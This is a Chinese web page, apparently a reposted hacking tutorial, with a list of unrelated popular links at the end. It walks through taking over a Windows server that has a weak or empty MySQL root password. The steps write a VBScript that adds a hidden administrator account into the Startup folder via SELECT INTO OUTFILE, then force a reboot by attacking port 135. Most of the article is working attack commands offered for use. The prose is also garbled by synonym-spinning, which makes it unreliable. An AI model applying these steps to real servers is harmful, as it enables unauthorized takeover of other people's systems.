MYSQL用户root密码为弱口令又一攻击方法
时间: 2021-07-31 作者:daque
look转自乒坛作家未知. 请与咱们接洽.前天,我发了一张对于mysql用户root暗号为空的贴,在网上我也找到少许运用此缺点的本领,普遍即是写一个asp或php的方便之门,不只很烦恼,并且还要猜解网站的目次,即使对方没有开iis,那咱们岂不没方法了?? 厥后,本人推敲想到一个方法,在我尝试的几台有此缺点的机中均赢得了胜利,现将我的报复本领颁布如次: 1、贯穿到对方mysql 效劳器 mysql -u root -h 192.168.0.1 mysql.exe 这个步调在你安置了mysql的的bin目次中 2、让咱们来看看效劳器中有些什么数据库 mysql>show databases; mysql默许安置时会有mysql、test这两个数据库,即使你看到有其它的数据库那么即是用户自行建造的数据库。 3、让咱们加入数据库 mysql>use test; 咱们将会加入test数据库中 4、察看咱们加入数据库中有些什么数据表 mysql>show tables; 默许的情景下,test中没有任何表的生存。 以次为要害的局部 5、在test数据库下创造一个新的表; mysql>create table a (cmd text); 好了,咱们创造了一个新的表,表名为a,表中只寄存一个字段,字段名为cmd,为text文本。 6、在表中插入实质 mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " ); mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators 1 /add"",0) " ); 提防双引号和括号以及反面的“0”确定要输出!咱们将用这三条吩咐来创造一个vbs的剧本步调! 7、好了,此刻咱们来看看表a中有些什么 mysql>select * from a; 咱们将会看到表中有三行数据,即是咱们方才输出的实质,确认你输出的实质精确后,咱们到达下一步 8、输入表为一个vbs的剧本文献 mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「发端」菜单\\步调\\启用\\a.vbs"; 咱们把咱们表中的实质输出到启用组中,是一个vbs的剧本文献!提防“\"标记。 9、看到这大师确定领会了,即是运用mysql输入一个可实行的文献罢了。干什么不必bat呢,由于启用运转时会有鲜明的dos窗口出来,而用vbs剧本则不妨实足湮没窗口且不会有缺点提醒!从来,该当再有一句实行剧本后机动简略此剧本的,然而华文目次简直没辙处置,惟有罢了!好了,找个东西报复135让效劳珍视启吧,几秒钟此后你即是处置员了。
相关推荐
热门阅览
最新排行
- 1 手机如何装windows系统,手机装windows系统教程
- 2 微信公众号重大调整 新公注册公众号将没有留言功能
- 3 烧杯app最剧烈的反应有哪些? 烧杯app攻略
- 4 微信小程序怎么用 微信小程序使用教程
- 5 360快剪辑怎么使用?360快剪辑图文视频教程
- 6 八分音符外挂神器:绝望中的战斗机
- 7 2017热门微信小程序排行榜 微信小程序二维码大全
- 8 微信聊天记录导出到电脑 怎么在电脑上查看微信聊天记录
- 9 在U递上赚钱和省钱教程 教你在U递上怎么赚钱何省钱
- 10 u递邀请码申请教程 u递邀请码领取方法
- 11 如何解决爱奇艺账号登陆验证 跳过爱奇艺账号手机登录验证方法分享 亲测好用
- 12 手机申请无限制申请QQ靓号 手机怎样无限申请Q号